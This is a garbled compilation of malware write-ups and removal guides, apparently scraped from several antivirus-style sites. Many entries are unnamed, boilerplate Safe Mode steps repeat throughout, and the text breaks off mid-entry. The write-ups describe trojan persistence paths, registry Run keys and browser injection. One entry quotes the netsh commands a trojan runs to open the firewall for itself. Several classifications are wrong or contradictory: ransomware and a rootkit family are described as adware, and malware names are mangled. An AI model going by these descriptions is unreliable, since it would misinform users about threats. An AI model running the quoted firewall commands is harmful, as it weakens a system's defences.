    %localappdata%\Google\Chrome\Plug\contentscript.js (23580 B)
    %localappdata%\Google\Chrome\Plug\fix.css (207 B)
    %localappdata%\Google\Chrome\Plug\icon-128.png (18489 B)
    %localappdata%\Google\Chrome\Plug\manifest.json (478 B)

    The trojan may set the following Registry entries:
    [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
    "DisableFirstRunCustomize" = 1
    "Play_Background_Sounds" = "no"
    The trojan terminates its execution if it detects that it's running in a specific virtual environment.

  • Technical Details:

     The trojan collects the following information:
    user name
    computer IP address
    screenshots
    The trojan is able to log keystrokes.

    The collected information is stored in the following file:
    %appdata%\87

  • Installation:

     When executed, the trojan copies itself into the following location:
    %startup%\Sirewa__.cpl
    This causes the trojan to be executed on every system start.

    The trojan copies itself to the following locations:
    %appdata%\Sirewa__.cpl
    %systemdrive%\WINDOWS\system32\Sirewa__.cpl
    The trojan creates and runs a new thread with its own program code within the following processes:
    firefox.exe
    iexplore.exe
    chrome.exe
    opera.exe
    navigator.exe
    safari.exe
    maxthon.exe
    The following files are modified:
    %startup%\Mozilla Firefox.lnk
    %startup%\Internet Explorer.lnk
    %startup%\Google Chrome.lnk

  • Spreading method:

     The trojan acquires data and commands from a remote computer or the Internet.

    The trojan contains a URL address. The HTTP protocol is used.

    It can execute the following operations:
    update itself to a newer version
    send gathered information

  • Remove:

     1. Remove all media such as floppy disks, CDs, DVDs, and USB devices. Then restart the computer and please do the following:
    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 systems
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

  • Technical Details:

     The trojan collects the following information:
    operating system version
    information about the operating system and system settings
    installed program components under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall] Registry subkeys
    amount of operating memory
    CPU information
    cookies
    opened port number
    the path to specific folders
    The trojan attempts to send gathered information to a remote machine.

    The trojan contains a URL address. The HTTP protocol is used.

  • Installation:

     The trojan does not create any copies of itself.

  • Technical Details:
  • Installation:

     When executed, the trojan copies itself into the following location:
    %programfiles%\FastWeb\fastweb.exe
    The trojan creates the following file:
    %programfiles%\FastWeb\config_ns1.dat (12 B)
    In order to be executed on every system start, the trojan sets the following Registry entry:
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    "fastweb" = "%programfiles%\FastWeb\fastweb.exe"

  • Thread:

     The trojan acquires data and commands from a remote computer or the Internet.

    The trojan contains a list of (6) URLs. The TCP protocol is used in the communication.

    The trojan serves as a proxy server.

    The trojan checks for Internet connectivity by trying to connect to the following addresses:
    duckduckgo.com

  • Technical Details:

     The trojan contains a list of (4) URLs.

    It tries to download a file from the addresses.

    The file is stored in the following location:
    %temp%\%variable%t.exe
    The file is then executed. The HTTP and FTP protocols are used.

    A string with variable content is used instead of %variable%.

  • Installation:

     The trojan does not create any copies of itself.

  • Remove:

     1. Remove all media such as floppy disks, CDs, DVDs, and USB devices. Then restart the computer and please do the following:
    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 systems
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.
    Start the computer in Safe Mode with Networking on Windows 8
    a) Before Windows begins to load, press Shift and F8 on your keyboard.
    b) On the Recovery interface, click 'See advanced repair options'.
    c) Next, click the Troubleshoot option.
    d) Then select Advanced options from the list.
    e) Lastly, choose Windows Startup Settings and click Restart. When Windows restarts, you will be sent to the familiar Advanced Boot Options screen.
    f) Select Safe Mode with Networking from the selection menu.

  • Technical Details:
  • Installation:

     When executed, the trojan creates one of the following files:
    %windir%\CRMSvc.exe (269312 B, MSIL/Agent.QXU)
    %programfiles%\CRMSvc\CRMSvc.exe (269312 B, MSIL/Agent.QXU)
    The trojan registers the file as a system service.

    This causes the trojan to be executed on every system start.

    The following Registry entries are set:
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D105DFE2-8DF6-4BA0-ABF1-392716658963}]
    "DisplayName" = "CRMSvc"
    "DisplayVersion" = "1.5.45.468"
    "EstimatedSize" = 278
    "InstallDate" = "%variable1%"
    "InstallLocation" = "%installfolder%"
    "NoModify" = 1
    "NoRepair" = 1
    "Publisher" = "CRM Ltd"
    "QuietUninstallString" = "%installfolder%\CRMSvc.exe --uninst"
    "UninstallString" = "%installfolder%\CRMSvc.exe --uninst"
    [HKEY_LOCAL_MACHINE\SOFTWARE\CRMSvc]
    "uid" = "%variable2%"
    A string with variable content is used instead of %variable1-2%.

  • Spreading method:

     The trojan acquires data and commands from a remote computer or the Internet.

    The trojan contains a list of (3) URLs. The TCP and HTTP protocols are used in the communication.

    It can execute the following operations:
    download files from a remote computer and/or the Internet
    run executable files
    update itself to a newer version
    set up a proxy server
    send gathered information

    The trojan may execute the following commands:
    cmd.exe /C netsh firewall delete allowedprogram "%installfolder%\CRMSvc.exe"
    cmd.exe /C netsh firewall add allowedprogram "%installfolder%\CRMSvc.exe" CRMSvc ENABLE
    cmd.exe /C netsh advfirewall firewall delete rule name="CRMSvc"
    cmd.exe /C netsh advfirewall firewall add rule name="CRMSvc" dir=in action=allow program="%installfolder%\CRMSvc.exe" enable=yes"
    sc.exe failure "CRMSvc" reset=2 actions=restart/10000

    The trojan requires the Microsoft .NET Framework to run.

  • Technical Details:

     Trojan:Win32/Dynamer!ac is a deadly computer Trojan that spreads via other malware or fake software updates. It may deceive users by posing as a file required to view a requested web page. Once executed, Trojan:Win32/Dynamer!ac carries out other harmful actions on the computer without the user's knowledge. The Trojan operates so discreetly that even an installed anti-virus program may not detect it.

    Once Trojan:Win32/Dynamer!ac infects a computer, it makes changes to the system, including adding registry values and entries that are essential to its function. The threat can alter Internet browser settings, causing browser redirects in which the user receives a page they did not request. Usually the redirect script is JavaScript integrated into the browser so that it executes when the user starts to surf the web.

    Detection of Trojan:Win32/Dynamer!ac may cover a large group of malicious programs or harmful scripts that share a matching payload. The purpose of this Trojan is to exploit a weakness in the system in order to redirect victims to predefined sites, which host other threats. Other variants of Trojan:Win32/Dynamer!ac are known to be used in the distribution of malware and rogue programs.

    To remove Trojan:Win32/Dynamer!ac effectively, you must complete the removal steps outlined on this page. It is important that you scan the computer with anti-virus and anti-malware tools.

  • Remove:

     How to Remove Trojan:Win32/Dynamer!ac

    Step 1 : Download Microsoft Safety Scanner and Run a Scan

    NOTE: We suggest that you PRINT or BOOKMARK this guide. Some steps require restarting the computer in order to successfully remove the threat.

    If you have a previous version of Microsoft Safety Scanner that is more than 10 days old, please disregard it. Download a new copy from the official web site. Every 10 days, Microsoft releases the latest edition of this tool with updated anti-virus definitions to ensure that it detects even the most recent malware threats.

    1. Download Microsoft Safety Scanner by clicking the button below and save it on your desktop. This is a free tool from Microsoft that offers on-demand scanning. It helps remove computer infections such as malware, viruses, and Trojans.

  • Technical Details:

     Characteristics
    When W64.Viknok.B!inf is executed, it connects to a specified command and control (C&C) server. Once the connection is established, the Trojan downloads a malicious file. This file is hard to identify because of the random file name it uses. W64.Viknok.B!inf then infects the file rpcss.dll in order to run its code each time you start Windows.

    It has also been observed that the W64.Viknok.B!inf Trojan is used to alter settings of the victim's Internet browser. The effects of these changes can be browser redirection, search result hijacking, and an unknown home page setting. Search result hijacking is the most apparent to victims. Reports show that after using Google to search the web, the user is redirected to an unknown web site after clicking on any of the results. This leads to an income-generating action: the landing page delivers advertisements that, when clicked or viewed, earn a profit for the referrer.

    Distribution
    W64.Viknok.B!inf normally spreads via spam email messages. It is attached to an email with a deceptive message prompting the recipient to open the file. When executed, W64.Viknok.B!inf checks the computer for an installed antivirus program and disables it.

  • Remove:

     How to Remove W64.Viknok.B!inf

    NOTE: We suggest that you PRINT or BOOKMARK this guide. Some steps require restarting the computer in order to successfully remove the threat.

    Step 1 : Scan and remove W64.Viknok.B!inf with MalwareBytes Anti-Malware

    This guide requires a tool called Malwarebytes' Anti-Malware. It is a free tool designed to eradicate various computer infections, including W64.Viknok.B!inf. The MBAM scanner and malware removal tool is distributed for free.

    1. In order to completely remove W64.Viknok.B!inf, it is best to download and run the recommended tool. Please click the button below to begin download.

  • Technical Details:

     VirTool:JS/Obfuscator.EK is a detection for a risky JavaScript file that hides itself to avoid detection by anti-virus programs. This JavaScript Trojan is usually found on malicious web sites and is made with the sole purpose of harming the visitor's computer. Among the hazards that VirTool:JS/Obfuscator.EK can bring to the PC are browser redirection, Trojan download, and backdoor access.

  • Remove:

     How to Remove VirTool:JS/Obfuscator.EK

    NOTE: We suggest that you PRINT or BOOKMARK this guide. Some steps require restarting the computer in order to successfully remove the threat.

    Step 1 : Scan and remove VirTool:JS/Obfuscator.EK with MalwareBytes Anti-Malware

    This guide requires a tool called Malwarebytes' Anti-Malware. It is a free tool designed to eradicate various computer infections, including VirTool:JS/Obfuscator.EK. The MBAM scanner and malware removal tool is distributed for free.

    1. In order to completely remove VirTool:JS/Obfuscator.EK, it is best to download and run the recommended tool. Please click the button below to begin download.

  • Technical Details:

     Backdoor.Generic11.ZNE is a risky computer Trojan that may permit a remote attacker to access the infected computer. This approach lets the crook perform dodgy actions such as stealing private data, downloading files, and monitoring certain activities. Backdoor.Generic11.ZNE silently achieves its goal by maintaining a discreet presence inside the PC. Its rootkit function allows the Trojan to run alongside a valid Windows process in order to avoid antivirus detection.

    Due to its ZeroAccess (rootkit) component, Backdoor.Generic11.ZNE manages to inject its malicious code into valid system driver files, which allows it to execute automatically each time Windows starts. It may also create a Windows service for the same purpose. Once loaded and running, Backdoor.Generic11.ZNE lowers security settings on the infected computer by ending processes linked to antivirus programs.

    As a result, the antivirus program fails to detect and remove Backdoor.Generic11.ZNE from a compromised system. Its ability to load at Windows boot-up must be stopped to end its hold on the affected machine. Thus, we highly advise you to use a removal tool made for this type of threat. Follow the guide below to remove Backdoor.Generic11.ZNE, as well as the other harmful files, from your computer.

  • Remove:

     How to Remove Backdoor.Generic11.ZNE

    Step 1 : Restart Windows in SafeMode with Networking

    Starting Windows in Safe Mode only loads a minimal set of files and drivers. Most start-up malware and viruses don't run in this mode because Windows only loads the basic components needed to initiate the system.

    NOTE: You will need to PRINT or BOOKMARK this procedure, as we have to restart the computer during the removal process.

    To start Windows in Safe Mode with Networking, please do the following:

    1. Remove all media such as floppy disks, CDs, DVDs, and USB devices. Then, restart the computer.

    Boot in Safe Mode on Windows XP, Windows Vista, and Windows 7 systems
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode.

    Start the computer in Safe Mode using Windows 8
    a) Before Windows begins to load, press Shift and F8 on your keyboard.
    b) On the Recovery interface, click on 'See advanced repair options'.
    c) Next, click on the Troubleshoot option.
    d) Then, select Advanced options from the list.
    e) Lastly, choose Windows Startup Settings and click on Restart. When Windows restarts, you will be sent to the familiar Advanced Boot Options screen.
    f) Select Safe Mode from the selections menu.

    2. Once the computer boots into Safe Mode with Networking, please proceed with the steps below.

  • Technical Details:

     Trojan.Pandex!inf is a generic detection for a harmful file that is normally used by malware authors to spread separate virus infections. The threat was also designed to gather email addresses from the infected system. In addition, Trojan.Pandex!inf interferes with your connection to security-related web sites, making sure that no updates are downloaded onto the infected computer.

  • Remove:

     How to Remove Trojan.Pandex!inf

    NOTE: We suggest that you PRINT or BOOKMARK this guide. Some steps require restarting the computer in order to successfully remove the threat.

    Step 1 : Scan and remove Trojan.Pandex!inf with MalwareBytes Anti-Malware

    This guide requires a tool called Malwarebytes' Anti-Malware. It is a free tool designed to eradicate various computer infections, including Trojan.Pandex!inf. The MBAM scanner and malware removal tool is distributed for free.

    1. In order to completely remove Trojan.Pandex!inf, it is best to download and run the recommended tool. Please click the button below to begin download.

    2. After downloading, double-click the file to install the application. If you are using Windows Vista or Windows 7, right-click the file and select 'Run as administrator' from the list.
    3. When User Account Control prompts, please click Yes to proceed with the installation.

    4. Follow the prompts and install as 'default' only. There are no changes needed during the installation process.
    5. Before the installation procedure ends, MalwareBytes Anti-Malware will ask for a database update; please proceed.

  • Technical Details:

     Characteristics
    Upon execution of Trojan-PSW.Win32.Dybalom.L, it drops a file under the Temp directory of Windows. Registry keys that are essential to perform its tasks are also added to the compromised computer.

    The Trojan is also found to have other harmful characteristics, such as the following:

    It may connect to the Internet and request additional malware files.
    The author of this Trojan utilized a packer that is not typically used for legitimate software.
    The Trojan may terminate any instance of security software services.
    It contains other characteristics and identified security risks.
    Distribution
    Trojan-PSW.Win32.Dybalom.L spreads through file-sharing networks. In most cases, a Trojan developer embeds its malicious code in legitimate executable files that are made available online through file-sharing servers. Using an encryption method not commonly used for commercial products, it often conceals itself from antivirus programs. There are no reports that this Trojan can infect other computers on a local network.

  • Remove:

     How to Remove Trojan-PSW.Win32.Dybalom.L

    NOTE: We suggest that you PRINT or BOOKMARK this guide. Some steps require restarting the computer in order to successfully remove the threat.

    Step 2 : Run a scan with your antivirus program

    1. Remove all media such as floppy disks, CDs, DVDs, and USB devices. Then, restart the computer and do the following:

    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 systems
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

    Start the computer in Safe Mode with Networking using Windows 8
    a) Before Windows begins to load, press Shift and F8 on your keyboard.
    b) On the Recovery interface, click on 'See advanced repair options'.
    c) Next, click on the Troubleshoot option.
    d) Then, select Advanced options from the list.
    e) Lastly, choose Windows Startup Settings and click on Restart. When Windows restarts, you will be sent to the familiar Advanced Boot Options screen.
    f) Select Safe Mode with Networking from the selections menu.

    2. Once Windows is running under Safe Mode with Networking, open your antivirus program and download the most recent update. This method ensures that your antivirus program can detect even newer variants of Trojan-PSW.Win32.Dybalom.L.

    Updating your antivirus software is a one-click process. Please refer to your software manual for complete instructions.

    3. Once updating is finished, run a full system scan on the affected PC. After the scan, delete all infected items. If an item cannot be cleaned or deleted, place it in quarantine instead.

  • Technical Details:

     The Trojan drops a malicious file that, when executed, takes advantage of Adobe Acrobat Reader vulnerabilities to download and execute additional malware.

    The additional threat may possess the following functionalities:

    Connects to various Trojan-specified domains
    Gathers system information such as the Windows version and installed service pack
    Allows a remote attacker to access the computer through a backdoor port
    Takes advantage of vulnerabilities in Adobe Reader and Acrobat versions 8.0 to 9.2, and probably older versions

    Distribution

    HTML/Malicious.PDF.Gen is primarily spread through spam operations, either as an email or an Internet campaign. Specifically, the main goal of HTML/Malicious.PDF.Gen is to download other malware that cannot be distributed over the said campaign. Being small in size and able to escape antivirus detection, this Trojan can easily fit in an email attachment. Authors of this Trojan also embed the code into downloadable executable files hosted on unsafe servers.

  • Remove:

     How to Remove HTML/Malicious.PDF.Gen

    NOTE: We suggest that you PRINT or BOOKMARK this guide. Some steps require restarting the computer in order to successfully remove the threat.

    Step 1 : Run a scan with your antivirus program

    1. The first thing you should do is reboot the computer in Safe Mode with Networking to prevent HTML/Malicious.PDF.Gen from loading at start-up.

    Remove all media such as floppy disks, CDs, DVDs, and USB devices. Then, restart the computer and do the following:

    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 systems
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

    Start the computer in Safe Mode with Networking using Windows 8
    a) Before Windows begins to load, press Shift and F8 on your keyboard.
    b) On the Recovery interface, click on 'See advanced repair options'.
    c) Next, click on the Troubleshoot option.
    d) Then, select Advanced options from the list.
    e) Lastly, choose Windows Startup Settings and click on Restart. When Windows restarts, you will be sent to the familiar Advanced Boot Options screen.
    f) Select Safe Mode with Networking from the selections menu.

    2. Once Windows is running under Safe Mode with Networking, open your antivirus program and download the most recent update. This method ensures that your antivirus program can detect even newer variants of HTML/Malicious.PDF.Gen.

    Updating your antivirus software is a one-click process. Please refer to your software manual for complete instructions.

    3. Once updating is finished, run a full system scan. After the scan, delete all infected items. If an item cannot be cleaned or deleted, place it in quarantine instead.

  • Technical Details:

     Gen:Adware.Heur is a heuristic detection for malicious code that may be installed on the computer by another threat. It can take the form of a browser hijacker, pop-up ads, a toolbar, or an unwanted browser add-on or extension. Normally, Gen:Adware.Heur is not as harmful as a virus, but it can be very annoying when installed on the computer.

    Gen:Adware.Heur was designed to identify files that possess suspicious behaviors indicating the presence of a potentially unwanted program. This detection may also identify programs that match the behavior of known adware programs.

    Unlike computer viruses, Gen:Adware.Heur is just software that produces advertisements, extra tools, or home page hijacking on the affected computer. It often comes bundled with third-party programs that you have downloaded voluntarily. Most people are aware of the program they are installing but are caught oblivious to the other code that comes with it.

    You must remove Gen:Adware.Heur from the computer using effective security tools such as anti-malware and anti-virus programs. The procedures below may help you remove the threat completely when carefully followed.

  • Remove:

     How to Remove Gen:Adware.Heur

    NOTE: We suggest that you PRINT or BOOKMARK this guide. Some steps require restarting the computer in order to successfully remove the threat.

    Step 1 : Run a scan with your antivirus program

    1. The first thing you should do is reboot the computer in Safe Mode with Networking to prevent Gen:Adware.Heur from loading at start-up.

    Remove all media such as floppy disks, CDs, DVDs, and USB devices. Then, restart the computer and do the following:

    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 systems
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

    Start the computer in Safe Mode with Networking using Windows 8
    a) Before Windows begins to load, press Shift and F8 on your keyboard.
    b) On the Recovery interface, click on 'See advanced repair options'.
    c) Next, click on the Troubleshoot option.
    d) Then, select Advanced options from the list.
    e) Lastly, choose Windows Startup Settings and click on Restart. When Windows restarts, you will be sent to the familiar Advanced Boot Options screen.
    f) Select Safe Mode with Networking from the selections menu.

    2. Once Windows is running under Safe Mode with Networking, open your antivirus program and download the most recent update. This method ensures that your antivirus program can detect even newer variants of Gen:Adware.Heur.

    Updating your antivirus software is a one-click process. Please refer to your software manual for complete instructions.

    3. Once updating is finished, run a full system scan. After the scan, delete all infected items. If an item cannot be cleaned or deleted, place it in quarantine instead.

  • Technical Details:

     Trojan.Newarxy is a harmful Trojan that can allow a remote attacker to utilize the infected system as a proxy server. This threat may spread on the Internet through another malware or virus. Trojan.Newarxy can also be obtained from risky file-sharing networks, also known as peer-to-peer connections. The backdoor function of Trojan.Newarxy allows an attacker to steal sensitive information, including user names and passwords stored on the PC.

  • Remove:

     How to Remove Trojan.Newarxy

    NOTE: We suggest that you PRINT or BOOKMARK this guide. Some steps require restarting the computer in order to successfully remove the threat.

    Step 1 : Run a scan with your antivirus program

    1. The first thing you should do is reboot the computer in Safe Mode with Networking to prevent Trojan.Newarxy from loading at start-up.

    Remove all media such as floppy disks, CDs, DVDs, and USB devices. Then, restart the computer and do the following:

    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 systems
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

    Start the computer in Safe Mode with Networking using Windows 8
    a) Before Windows begins to load, press Shift and F8 on your keyboard.
    b) On the Recovery interface, click on 'See advanced repair options'.
    c) Next, click on the Troubleshoot option.
    d) Then, select Advanced options from the list.
    e) Lastly, choose Windows Startup Settings and click on Restart. When Windows restarts, you will be sent to the familiar Advanced Boot Options screen.
    f) Select Safe Mode with Networking from the selections menu.

    2. Once Windows is running under Safe Mode with Networking, open your antivirus program and download the most recent update. This method ensures that your antivirus program can detect even newer variants of Trojan.Newarxy.

    Updating your antivirus software is a one-click process. Please refer to your software manual for complete instructions.

    3. Once updating is finished, run a full system scan. After the scan, delete all infected items. If an item cannot be cleaned or deleted, place it in quarantine instead.

  • Technical Details:

     PWS:Win32/Zbot.gen!plock is a generic detection for a variant of a Trojan that can steal sensitive information from infected computers. It may also block some antivirus programs from running by disabling their processes. PWS:Win32/Zbot.gen!plock will also try to connect to a remote server and download more threats. This password-stealing threat records key presses on the infected computer and saves them to a log file. It then sends the gathered data to a remote attacker on a specific schedule via email or file transfer protocol.

  • Remove:

     How to Remove PWS:Win32/Zbot.gen!plock

    NOTE: We suggest that you PRINT or BOOKMARK this guide. Some steps require restarting the computer in order to successfully remove the threat.

    Step 2 : Run a scan with your antivirus program

    1. Remove all media such as floppy disks, CDs, DVDs, and USB devices. Then, restart the computer and do the following:

    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 systems
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

    Start the computer in Safe Mode with Networking using Windows 8
    a) Before Windows begins to load, press Shift and F8 on your keyboard.
    b) On the Recovery interface, click on 'See advanced repair options'.
    c) Next, click on the Troubleshoot option.
    d) Then, select Advanced options from the list.
    e) Lastly, choose Windows Startup Settings and click on Restart. When Windows restarts, you will be sent to the familiar Advanced Boot Options screen.
    f) Select Safe Mode with Networking from the selections menu.

    2. Once Windows is running under Safe Mode with Networking, open your antivirus program and download the most recent update. This method ensures that your antivirus program can detect even newer variants of PWS:Win32/Zbot.gen!plock.

    Updating your antivirus software is a one-click process. Please refer to your software manual for complete instructions.

    3. Once updating is finished, run a full system scan on the affected PC. After the scan, delete all infected items. If an item cannot be cleaned or deleted, place it in quarantine instead.

  • Technical Details:

     Exploit:Java/Obfuscator.P is a potentially unwanted program. It can be installed on the computer through download managers and third-party software. Usually, programs like Exploit:Java/Obfuscator.P are installed on the computer without the user's consent. A pay-per-install scheme is also utilized by the people behind this program to deploy it more rapidly. This method does not only load Java/Obfuscator.P; it may also distribute malicious programs like toolbars and home page hijackers along with it.

    If Java/Obfuscator.P is present on the computer, users may immediately observe certain changes in the browser. This program may display a barrage of pop-ups and other annoyances. It can add a toolbar bearing its name or hijack the home page using its custom search engine. Other components of Java/Obfuscator.P may also be installed, but re-branded to hide their origin.

    If you have purposely installed Java/Obfuscator.P, a bunch of programs and tools will also surface on the computer without your consent. Some can be uninstalled from the Windows Control Panel, but others will give you difficulty during the removal process. Adware usually comes packed with unwanted programs such as Java/Obfuscator.P, and most people are not given sufficient information about it. For this reason, potentially unwanted programs are deemed malicious by security experts. Although they are not considered viruses, it is still much safer to uninstall such programs.

    To be able to remove Java/Obfuscator.P and other adware from the computer, we have outlined systematic procedures on this page. Carefully follow the guide and download the necessary tools that will help you remove the adware effectively.

  • Remove:

     How to Remove Exploit:Java/Obfuscator.P

    NOTE: We suggest that you PRINT or BOOKMARK this guide. Some steps require restarting the computer in order to successfully remove the threat.

    Step 1 : Run a scan with your antivirus program

    1. The first thing you should do is reboot the computer in Safe Mode with Networking to prevent Exploit:Java/Obfuscator.P from loading at start-up.

    Remove all media such as floppy disks, CDs, DVDs, and USB devices. Then, restart the computer and do the following:

    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 systems
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

    Start the computer in Safe Mode with Networking using Windows 8
    a) Before Windows begins to load, press Shift and F8 on your keyboard.
    b) On the Recovery interface, click on 'See advanced repair options'.
    c) Next, click on the Troubleshoot option.
    d) Then, select Advanced options from the list.
    e) Lastly, choose Windows Startup Settings and click on Restart. When Windows restarts, you will be sent to the familiar Advanced Boot Options screen.
    f) Select Safe Mode with Networking from the selections menu.

    2. Once Windows is running under Safe Mode with Networking, open your antivirus program and download the most recent update. This method ensures that your antivirus program can detect even newer variants of Exploit:Java/Obfuscator.P.

    Updating your antivirus software is a one-click process. Please refer to your software manual for complete instructions.

    3. Once updating is finished, run a full system scan. After the scan, delete all infected items. If an item cannot be cleaned or deleted, place it in quarantine instead.

  • Technical Details:

     TROJ_CRYPTFILE.SM is a potentially unwanted program. It is typically installed on the computer through a download manager and third-party software. Usually, programs like TROJ_CRYPTFILE.SM are installed on the computer without the user's consent. The malware producers use a pay-per-install scheme to deploy it more rapidly. This method does not only load TROJ_CRYPTFILE.SM; it may also distribute malicious programs like toolbars and home page hijackers along with it. It's best to quickly remove TROJ_CRYPTFILE.SM and get rid of this adware before it has a chance to steal your private information.

    TROJ_CRYPTFILE.SM is an unwanted program because once it establishes itself on your computer it attempts to encrypt your files and then contacts you to demand payment to release these files. This is a common new type of malware called ransomware. It is a dangerous and wide-ranging type of Trojan.

  • Remove:

     How to Remove TROJ_CRYPTFILE.SM Ransomware

    NOTE: We suggest that you PRINT or BOOKMARK this guide. Some steps require restarting the computer in order to successfully remove the threat.

    Step 1 : Run a scan with your antivirus program

    1. The first thing you should do is reboot the computer in Safe Mode with Networking to prevent TROJ_CRYPTFILE.SM from loading at start-up.

    Remove all media such as floppy disks, CDs, DVDs, and USB devices. Then, restart the computer and do the following:

    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 systems
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

    Start the computer in Safe Mode with Networking using Windows 8
    a) Before Windows begins to load, press Shift and F8 on your keyboard.
    b) On the Recovery interface, click on 'See advanced repair options'.
    c) Next, click on the Troubleshoot option.
    d) Then, select Advanced options from the list.
    e) Lastly, choose Windows Startup Settings and click on Restart. When Windows restarts, you will be sent to the familiar Advanced Boot Options screen.
    f) Select Safe Mode with Networking from the selections menu.

    2. Once Windows is running under Safe Mode with Networking, open your antivirus program and download the most recent update. This method ensures that your antivirus program can detect even newer variants of TROJ_CRYPTFILE.SM.

    Updating your antivirus software is a one-click process. Please refer to your software manual for complete instructions.

    3. Once updating is finished, run a full system scan. After the scan, delete all infected items. If an item cannot be cleaned or deleted, place it in quarantine instead.

  • Technical Details:

     Remove Trojan:Win32/Autoac from your computer with this guide. To uninstall Trojan:Win32/Autoac, specific steps must be completed: please start with the safe malware scanning tool, then finish the guide in order to get rid of this program permanently. Trojan:Win32/Autoac is a potentially unwanted program that provides non-beneficial and misleading information to the user. This program has a negative online reputation for utilizing this type of information to mislead users.

  • Thread:

     The symptoms of Trojan:Win32/Autoac adware you will see are as follows:
    1. Potentially installing unwanted programs onto the user's computer.
    2. Links to random web pages presented in your browser as text hyperlinks.
    3. Pop-up advertising, fake updates, and other unwanted software updates.
    4. Being unable to do certain things with the Windows config file or unable to uninstall the program.
    Trojan:Win32/Autoac, Protect Yourself!
    Trojan:Win32/Autoac is a malware program that is typically bundled with other potentially useful software in a "pay per install" distribution network. This happens when you download software that you actually want to use on your computer: sometimes adware like Trojan:Win32/Autoac is installed along with the wanted program.

    In order to avoid this type of installation, please read very carefully when you are installing software. Always choose custom install instead of "typical", and then during the custom installation, UNCHECK any boxes that show up inviting you to try new software, that is, anything that is not the software you WANTED to install.

    If you're careful when you download and install programs, you will be safe from Trojan:Win32/Autoac and other similar programs.

  • Remove:

     Trojan:Win32/Autoac is a program that wants you to believe it is offering you a useful service. This PUP tries to tell you that it is providing a service that you need, such as uninstallation, music files, a movie player, etc. This description of the program could be considered useful; however, the information, redirection and advertising it provides is negative.

    After installation, Trojan:Win32/Autoac can embed itself deeply into your computer and make it very difficult to remove.
    The primary purpose of Trojan:Win32/Autoac is to hijack your computer so that it can allow for other installations of malware, or potentially unwanted programs. It is best to get rid of Trojan:Win32/Autoac before any of this can happen.

  • Technical Details:

     Remove DOS/Alureon.J from your computer with this guide. To uninstall DOS/Alureon.J, specific steps must be completed: please start with the safe malware scanning tool, then finish the guide in order to get rid of this program permanently. DOS/Alureon.J is a potentially unwanted program that provides non-beneficial and misleading information to the user. This program has a negative online reputation for utilizing this type of information to mislead users.

  • Remove:

     DOS/Alureon.J Removal Guide
    DOS/Alureon.J is a program that wants you to believe it is offering you a useful service. This PUP tries to tell you that it is providing a service that you need, such as uninstallation, music files, a movie player, etc. This description of the program could be considered useful; however, the information, redirection and advertising it provides is negative.



    After installation, DOS/Alureon.J can embed itself deeply into your computer and make it very difficult to remove.
    The primary purpose of DOS/Alureon.J is to hijack your computer so that it can allow for other installations of malware, or potentially unwanted programs. It is best to get rid of DOS/Alureon.J before any of this can happen.

    The symptoms of DOS/Alureon.J adware you will see are as follows:
    1. Potentially unwanted programs installed onto the user’s computer.
    2. Links to random web pages presented in your browser as text hyperlinks.
    3. Pop-up advertising, fake updates, and other unwanted software updates.
    4. Being unable to do certain things with the Windows config file, or unable to uninstall the program.

  • Technical Details:

     Remove TROJAN : WIN32 / DYNAMERLAC from your computer with this guide. To uninstall TROJAN : WIN32 / DYNAMERLAC, specific steps must be completed: start with the safe malware scanning tool, then finish the guide in order to get rid of this program permanently.

  • Spreading method:

     TROJAN : WIN32 / DYNAMERLAC is a malware program that is typically bundled with other, potentially useful software in a “pay per install” distribution network. When you download software that you actually want to use on your computer, adware like TROJAN : WIN32 / DYNAMERLAC is sometimes installed along with the wanted program.

    To avoid this type of installation, read carefully when you install software. Always choose a custom install instead of the “typical” one, and during the custom installation UNCHECK any box that invites you to try additional software, i.e. anything that is not the software you WANTED to install.

    If you are careful when you download and install programs, you will be safe from TROJAN : WIN32 / DYNAMERLAC and other similar programs.

  • Remove:

     TROJAN : WIN32 / DYNAMERLAC is a program that wants you to believe it is offering a useful service. This PUP tries to tell you that it provides a service you need, such as an uninstaller, music files, a movie player, etc. That description could sound useful; however, the information, redirection and advertising it actually provides is harmful.

    After installation, TROJAN : WIN32 / DYNAMERLAC can embed itself deeply into your computer and become very difficult to remove.
    The primary purpose of TROJAN : WIN32 / DYNAMERLAC is to hijack your computer so that it can allow further installations of malware or potentially unwanted programs. It is best to get rid of TROJAN : WIN32 / DYNAMERLAC before any of this can happen.

    The symptoms of TROJAN : WIN32 / DYNAMERLAC adware you will see are as follows:
    1. Potentially unwanted programs installed onto the user’s computer.
    2. Links to random web pages presented in your browser as text hyperlinks.
    3. Pop-up advertising, fake updates, and other unwanted software updates.
    4. Being unable to do certain things with the Windows config file, or unable to uninstall the program.

  • Technical Details:

